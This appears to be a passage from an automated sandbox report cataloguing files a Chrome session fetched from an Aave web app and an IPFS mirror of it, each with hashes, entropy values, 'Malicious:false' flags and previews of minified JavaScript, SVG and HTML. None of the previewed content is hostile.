                                                                                                                                                                                                                                                  MD5:95AE7542EFC3446F900E562F9E80C34D
                                                                                                                                                                                                                                                  SHA1:6BE12DB68A3CE3A42E00D0CDC93F0CB2947374AC
                                                                                                                                                                                                                                                  SHA-256:13405B6B187FC84BF1E9682945DDF607F8B04A9BD21C9A90EDD2FF54B799627B
                                                                                                                                                                                                                                                  SHA-512:43E1394C1C02BD97737BA3FC91AB39CF75BB9BEDBA2453621D801DCBAD61EE871B9F3D8FA673E5357D2C8DC354E3169C5939BE861B962D5974F453482F8D84A2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:!function(){"use strict";var e={},t={};function n(c){var r=t[c];if(void 0!==r)return r.exports;var a=t[c]={id:c,loaded:!1,exports:{}},f=!0;try{e[c].call(a.exports,a,a.exports,n),f=!1}finally{f&&delete t[c]}return a.loaded=!0,a.exports}n.m=e,n.amdO={},function(){var e=[];n.O=function(t,c,r,a){if(!c){var f=1/0;for(u=0;u<e.length;u++){c=e[u][0],r=e[u][1],a=e[u][2];for(var d=!0,o=0;o<c.length;o++)(!1&a||f>=a)&&Object.keys(n.O).every((function(e){return n.O[e](c[o])}))?c.splice(o--,1):(d=!1,a<f&&(f=a));if(d){e.splice(u--,1);var i=r();void 0!==i&&(t=i)}}return t}a=a||0;for(var u=e.length;u>0&&e[u-1][2]>a;u--)e[u]=e[u-1];e[u]=[c,r,a]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(c,r){if(1&r&&(c=this(c)),8&r)return c;if("object"===typeof c&&c){if(4&r&&c.__esModule)return c;if(16&r&&"function"===ty
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):70543
                                                                                                                                                                                                                                                  Entropy (8bit):5.443304347648602
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:Mk/KYVecVwNTv6EP8yiEVun51II7OzOAqpq3nmFpijktGnNgmELibDC4JbdEymsq:M0zejNTv6fTIIazpD3mF4jk0E+Ccm
                                                                                                                                                                                                                                                  MD5:5C6E1CB3531AE2B7393D1718BDAE95E5
                                                                                                                                                                                                                                                  SHA1:77478556A2513BFA79A1013A6144450084BFAE04
                                                                                                                                                                                                                                                  SHA-256:0FF0F10151A016F9A4503E21C8D1420FF1EA289967E9F90EE44087575003FEFE
                                                                                                                                                                                                                                                  SHA-512:8FF544E25C9B8D9E665E61A86E8781810D25DDDB9DAC6BC5CDEA6548D7817EEFAD84630F70BA978A26416231ABD8D4A5EFA795239B616E3E6A007D6BE9285738
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3253],{96875:function(e,t,n){n.d(t,{o:function(){return b}});var r=n(59499),i=n(4730),a=n(49501),o=n(1279),s=n(62097),c=n(30120),u=n(29630),l=n(75084),d=n(70794),p=n(41024),m=n(85893),f=["value","onInfoClick"];function y(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function x(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?y(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):y(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var b=function(e){var t=e.value,n=e.onInfoClick,r=(0,i.Z)(e,f),y=(0,s.Z)().palette,b=Number((0,o.hE)(t).toFixed(2,d.Z.ROUND_DOWN)),h="";ret
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (29845), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):29845
                                                                                                                                                                                                                                                  Entropy (8bit):5.546544997481404
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:zyPkWVecfO1uKmjehCsSFfrzOFekd175inho:aeT1iehCzOj7V
                                                                                                                                                                                                                                                  MD5:71AFA37372BCF5B4969D120D11EDA787
                                                                                                                                                                                                                                                  SHA1:48CD9B5E0845DD65B2A94F24457DD23705F95ABD
                                                                                                                                                                                                                                                  SHA-256:1252C8A202667C63CFBAB39C563C47BF4755185E82EAA585A8E4906368E34865
                                                                                                                                                                                                                                                  SHA-512:41BE0E66A98416B8EF9255008B91E7C9118431A89D6458C49F2323CFF5DE84448DD9D416A7620D76EB1DC0A600ADE9A3D2649C4BD948CEC437C6AAAF308B28FB
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/501.564b7abbe0ff055e.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[501],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),i=n(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},29002:function(e,t,n){n.d(t,{o:function(){return d}});var r=n(59499),o=n(4730),i=n(81645),a=n(85893),s=["sx"];function c(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16439), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16439
                                                                                                                                                                                                                                                  Entropy (8bit):5.532133558675556
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:cyPm/vOVBOSFcC0smTz1L0E1b51pfXKDPm2ZVvbNjsrb2pElTkwX:cyPQvGBO3CAR0kBf4bhjsrb2Gl1X
                                                                                                                                                                                                                                                  MD5:D071F37A5E9BE84050A1951BEF0A6266
                                                                                                                                                                                                                                                  SHA1:83FA47D734EBA0F3ECE11CB6030B50B4030AC5B0
                                                                                                                                                                                                                                                  SHA-256:23DB1E64D4FFE1F6F246F43E24F770D0388AF0AF4C0039C57EC61CC1AF3F2EF3
                                                                                                                                                                                                                                                  SHA-512:267D915343B8905233F52C732393AA4AA11DB027DE048207040B566B1847C1DC4599A961C40B3905ED173A1CBEE7A42BCE8AD5253CC303FF4622700FB119C48F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3695],{62753:function(e,r,t){var n=t(64836);r.Z=void 0;var o=n(t(64938)),s=t(85893),a=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");r.Z=a},89722:function(e,r,t){t.d(r,{Z:function(){return b}});var n=t(87462),o=t(63366),s=t(67294),a=t(86010),i=t(94780),l=t(81719),c=t(78884),u=t(36622),d=t(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,t(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var f=t(85893);const h=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16091), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16091
                                                                                                                                                                                                                                                  Entropy (8bit):5.521707777427411
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:bYaVPtiKrVPKyXRZ016I8m+EKlDvtpgvYdMixYQuRI7bKNJjZUuI0349Ez0hV:kytiAkgRDlpgvYp1uRI7OzFUuD349EU
                                                                                                                                                                                                                                                  MD5:9E29B53E7682A0F7CB1876DD826FBCBF
                                                                                                                                                                                                                                                  SHA1:2E4259B5817F72A2831CD316BE820DDE2905552D
                                                                                                                                                                                                                                                  SHA-256:7A55DBBCF7FC87BF9D71F04C3C7498BA40B88ACFB273C854E30413B4A387C332
                                                                                                                                                                                                                                                  SHA-512:52E5AEE042E7EECF79CABAF417B78C8EC01E840AC730876FD7E9D471160D532D8E19A6AF8687A1B280EDFE9E2F9F57AA108129FCA3FBC562FB48F274098AC741
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5903],{40535:function(e,t,r){r.d(t,{V:function(){return b}});var n=r(49501),o=r(62097),i=r(61225),s=r(30120),a=r(29630),l=r(75084),c=r(78371),u=r(67728),d=r(25563),p=r(68861),x=r(85893),b=function(e){var t=e.pageTitle,r=e.withMarketSwitcher,b=e.withMigrateButton,f=(0,c.Y)((function(e){return(0,u.lY)(e)})),h=(0,o.Z)(),m=(0,i.Z)(h.breakpoints.up("lg")),y=(0,i.Z)(h.breakpoints.down("xsm"));return(0,x.jsxs)(s.Z,{sx:{display:"flex",alignItems:{xs:"flex-start",xsm:"center"},mb:t?4:0,flexDirection:{xs:"column",xsm:"row"}},children:[t&&(y||!r)&&(0,x.jsx)(s.Z,{sx:{display:"flex",alignItems:"flex-start"},children:(0,x.jsx)(a.Z,{variant:y?"h2":m?"display1":"h1",sx:{color:r?"text.muted":"text.white",mr:{xs:5,xsm:3},mb:{xs:1,xsm:0}},children:t})}),(0,x.jsxs)(s.Z,{sx:{display:"flex",alignItems:"flex-start",flexWrap:"wrap",mb:t?0:4},children:[r&&(0,x.jsx)(d.tF,{}),f&&b&&(0,x.jsx)(p.rU,{href:p.Z6.migrationTool,sx:{mt:{xs:2,xsm:0}},c
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):98199
                                                                                                                                                                                                                                                  Entropy (8bit):5.359890515287186
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:h5VywfFn9AXoLHJPwp6CDkNt1NxeK2XSL7oUBKxmU:BywfFn9AYwNDknxeK2XCMUumU
                                                                                                                                                                                                                                                  MD5:F51A64F06BFED810A5CFC6402C2123A8
                                                                                                                                                                                                                                                  SHA1:A7FC6A646E8EBA3BAF97086447BB4A926917085D
                                                                                                                                                                                                                                                  SHA-256:6070761CB3121C7341C1E67971664BE14804CF090AACEF374E37EC7BAE27CFA5
                                                                                                                                                                                                                                                  SHA-512:F0EBC12CFE6DC71DD179A2819B2DA68564BA20FA5EBE876AEF81395B3BB14B7D3BF49A15A548B25F956DEEC16389F45A79799626DDBDCED3E77AE5C8C5EDBFF5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/markets/
                                                                                                                                                                                                                                                  Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="initial-scale=1, width=device-width"/><title>Aave - Open Source Liquidity Protocol</title><meta name="description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:title" content="Aave - Open Source Liquidity Protocol"/><meta property="og:description" content="Aave is an Open Source Protocol to create Non-Custodial Liquidity Markets to earn interest on supplying and borrowing assets with a variable or stable interest rate. The protocol is designed for easy integration into your products and services."/><meta property="og:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twitter:image" content="https://app.aave.com/aaveMetaLogo-min.jpg"/><meta name="twit
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5507), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):5507
                                                                                                                                                                                                                                                  Entropy (8bit):5.481030461721088
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:lMtWr4S/EVqZDO9OaSlzXXEn2PLSpUiA+xasakqNETmycVoYVj6wHyC2oRO0:+rV+0SlznE2DSpzA+xnqyBcvhvs0
                                                                                                                                                                                                                                                  MD5:EA272551F134504A115FC4C84C3BBE93
                                                                                                                                                                                                                                                  SHA1:75F3C62FE62A928C4A5A0F7BD56C686EB620BCA4
                                                                                                                                                                                                                                                  SHA-256:A47B6968BAFBEF87B8145C2442ACE30F845787A69D59AA95860F7FEA97E5DF19
                                                                                                                                                                                                                                                  SHA-512:AFDAD0A6729DE5026FB373CC80A7E61A5125B48046B394188F41932E34D937CB547F244DBA8B1E049F440198DB6FBC4ABD8B3487ABF0FEB522559CCA97F84BB0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/webpack-e3633ebc14262ebc.js
                                                                                                                                                                                                                                                  Preview:!function(){"use strict";var e={},t={};function n(r){var c=t[r];if(void 0!==c)return c.exports;var f=t[r]={id:r,loaded:!1,exports:{}},a=!0;try{e[r].call(f.exports,f,f.exports,n),a=!1}finally{a&&delete t[r]}return f.loaded=!0,f.exports}n.m=e,n.amdO={},function(){var e=[];n.O=function(t,r,c,f){if(!r){var a=1/0;for(u=0;u<e.length;u++){r=e[u][0],c=e[u][1],f=e[u][2];for(var o=!0,d=0;d<r.length;d++)(!1&f||a>=f)&&Object.keys(n.O).every((function(e){return n.O[e](r[d])}))?r.splice(d--,1):(o=!1,f<a&&(a=f));if(o){e.splice(u--,1);var i=c();void 0!==i&&(t=i)}}return t}f=f||0;for(var u=e.length;u>0&&e[u-1][2]>f;u--)e[u]=e[u-1];e[u]=[r,c,f]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(r,c){if(1&c&&(r=this(r)),8&c)return r;if("object"===typeof r&&r){if(4&c&&r.__esModule)return r;if(16&c&&"function"===ty
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (32296), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):32296
                                                                                                                                                                                                                                                  Entropy (8bit):5.550842940232815
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:CyPQpv2tTvUpTwuWVecfO4ti1GxYdx1puDe7Ne9ESPtQ5kcOCFlFPB:I+c0FeTCGOtQaM
                                                                                                                                                                                                                                                  MD5:206FCD11C80531EFFF8F2F0AE620819B
                                                                                                                                                                                                                                                  SHA1:F94505BDD8F4B2BAEFFE73EF659A50DCFBA1398A
                                                                                                                                                                                                                                                  SHA-256:0C11EF67255006BCCBE420902EB81957506A452FA5FB039D527FB07E3A49D0AE
                                                                                                                                                                                                                                                  SHA-512:20684F4292AC134B3337DF04D0B11C680FBF9EE3EEB45DC0136B73CA5E80169971C00DC25DE6DC797286499E445D45DEE8BE4DA231ED3D4D060FDA0B162874F9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/1066.2c0391345744a196.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1066],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=a},75158:function(e,n,t){t.d(n,{Z:function(){return Z}});var r=t(63366),o=t(87462),i=t(67294),a=t(86010),s=t(94780),c=t(41796),l=t(37743),d=t(54235),u=t(85893),x=(0,d.Z)((0,u.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),p=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (31848), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):31848
                                                                                                                                                                                                                                                  Entropy (8bit):5.551056037443256
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:CyPQpv2tTve/VeiWVecfO493+pO1Mrze9ESPl05GcOCFlFPB:I+UkReTxpPYl0MM
                                                                                                                                                                                                                                                  MD5:B722F5F8EE79F46DC074BB4D3D655B6E
                                                                                                                                                                                                                                                  SHA1:E086CBB0C7C6E7AD55780244F4ACFA77A0F8F651
                                                                                                                                                                                                                                                  SHA-256:A6554FEBEDB7E66DBEA6127167179E2368FEC2F91664631AE8DBCFB19E43CEA9
                                                                                                                                                                                                                                                  SHA-512:0CDDF7960617938C8C43B51F2AE279C78BF5584560F1E86D177A805369EEED63EEF3BADBFC8AE820BF11E417D369D4CA28F012F1D61576C42EF09B0BB7C8F9C0
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1066],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=a},75158:function(e,n,t){t.d(n,{Z:function(){return Z}});var r=t(63366),o=t(87462),i=t(67294),a=t(86010),s=t(94780),c=t(41796),l=t(37743),d=t(54235),u=t(85893),x=(0,d.Z)((0,u.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),p=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10847), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):10847
                                                                                                                                                                                                                                                  Entropy (8bit):5.5294236279994795
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:iyqKFTyZKx5JbuQmeAlNISkhCs4ydzIvYQOEyrKYgiq8f/yD:dcQmVTUhCs4Xd2bk
                                                                                                                                                                                                                                                  MD5:9969F4D371CA5605F2421FF0D3B3CC07
                                                                                                                                                                                                                                                  SHA1:5981EC8B760CB462F36A1E41F6822D2826DA92EB
                                                                                                                                                                                                                                                  SHA-256:ABCC29F4830E08FF4C3A173855C32BB82975AC2F7E3D7E12AD715664561C18F3
                                                                                                                                                                                                                                                  SHA-512:959F001EFEE7213A105129BFE1974E9C5C463A885066610AD19FEE8788CF6AD421875F67CDA90A73BDD287D009A6772FFACB68FA6C22F746B8430C3796DE2FE5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6806.18ebffe630a5cedb.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6806],{81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},25049:function(e,t,n){n.d(t,{Y:function(){return d}});var r=n(59499),o=n(4730),a=n(49501),s=n(81902),i=n(58527),c=n(85893),u=["capType"];function l(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function p(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?l(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):l(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var d=function(e){var t=e.capType,n=(0,o.Z)(e,u),r=t===s.R.supplyCap?(0,
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1539
                                                                                                                                                                                                                                                  Entropy (8bit):4.428516830349932
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:d/tgAQX0DURLzMDLw8zUBenQ3CQqUB1JimiZCmfwFvSNu:dILz27UBerUBTimiAmfEvX
                                                                                                                                                                                                                                                  MD5:43BD7162F501C198761C91E5B66AFCC9
                                                                                                                                                                                                                                                  SHA1:88E64A60ACA36599AC33C6D3E336B891925CB5EF
                                                                                                                                                                                                                                                  SHA-256:E82105DE6E30BC72DE5DC35335354346C7452A71D8E9029BD160376FAE01A5B7
                                                                                                                                                                                                                                                  SHA-512:73C470CEE93EA08E7CA55FCC46F0A7C38A013F7F08C01560DFC9AF6F6D52492C35E8682E9424E0B5B89C52ADAD472088C79EF668F96F90516C23B33668E1E51A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg width="145" height="24" viewBox="0 0 145 24" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M132.194 19.069c-3.091 0-5.838-2.24-6.546-5.332h18.353s.099-1.12.099-1.517c0-6.563-5.34-11.904-11.903-11.904-6.563 0-11.903 5.34-11.903 11.904 0 6.565 5.31 11.78 11.903 11.78 6.593 0 10.443-4.857 11.404-8.373h-5.595s-1.779 3.442-5.812 3.442Zm.003-13.824c2.964 0 5.537 1.958 6.418 4.875h-12.836c.878-2.917 3.452-4.875 6.418-4.875ZM62.16 24c-6.563 0-11.711-5.284-11.711-11.78 0-6.495 5.34-11.904 11.903-11.904 6.563 0 11.902 5.55 11.902 11.841V23.41h-4.62v-3.755l-.337-.089C68.483 21.561 65.535 24 62.159 24h.001Zm.192-18.755c-3.707 0-6.724 3.112-6.724 6.939 0 3.826 3.016 6.886 6.724 6.886s6.723-3.089 6.723-6.886c0-3.798-3.016-6.939-6.723-6.939ZM87.441 24c-6.563 0-11.711-5.284-11.711-11.78C75.73 5.725 81.07.316 87.633.316c6.563 0 11.903 5.55 11.903 11.841V23.41h-4.622v-3.755l-.336-.089C93.764 21.561 90.816 24 87.44 24h.001Zm.192-18.755c-3.707 0-6.724 3.112-6.724 6.939 0 3.826 3.016 6.886 6
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7572), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):7572
                                                                                                                                                                                                                                                  Entropy (8bit):5.365534498478483
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:Pf30aQNTbM9JTXZw79oM8MTNT9mhTQ0U850U8zdf:PHUTbM9JTupxmTQJ85J8xf
                                                                                                                                                                                                                                                  MD5:4B2838AA145F5808AD6342C3CBABF5E1
                                                                                                                                                                                                                                                  SHA1:33766DE3BBF3EAEDED756F10FF420C464A6D2525
                                                                                                                                                                                                                                                  SHA-256:8F992664E98CE82069160551B944D5C10FFCFB78C6BCCA6CED994DA5B56DF742
                                                                                                                                                                                                                                                  SHA-512:E2A2A0A9EDF9913F2F72795117613518D00BD26894529C92C591594CE2BB298A1559AADAE577C4551440EC96E825ADBE612CBF9E7F52208C67A39DD7CF906954
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[330],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),n=r(67294),i=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867);function g(e){return(0,f.Z)("MuiToggleButton",e)}var h=(0,r(1588).Z)("MuiToggleButton",["root","disabled","selected","standard","primary","secondary","sizeSmall","sizeMedium","sizeLarge"]),v=r(85893);const b=["children","className","color","disabled","disableFocusRipple","fullWidth","onChange","onClick","selected","size","value"],m=(0,p.ZP)(d.Z,{name:"MuiToggleButton",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,t[`size${(0,c.Z)(r.size)}`]]}})((({theme:e,ownerState:t})=>{let r,o="standard"===t.color?e.palette.text.primary:e.palette[t.color].main;return e.vars&&(o="standard"===t.color?e.vars.palette.text.primary:e.vars.palette[t.color].main,r="standard"===t.color?e.vars.palette.text.primaryChannel:e.vars.pal
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (15198), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):15198
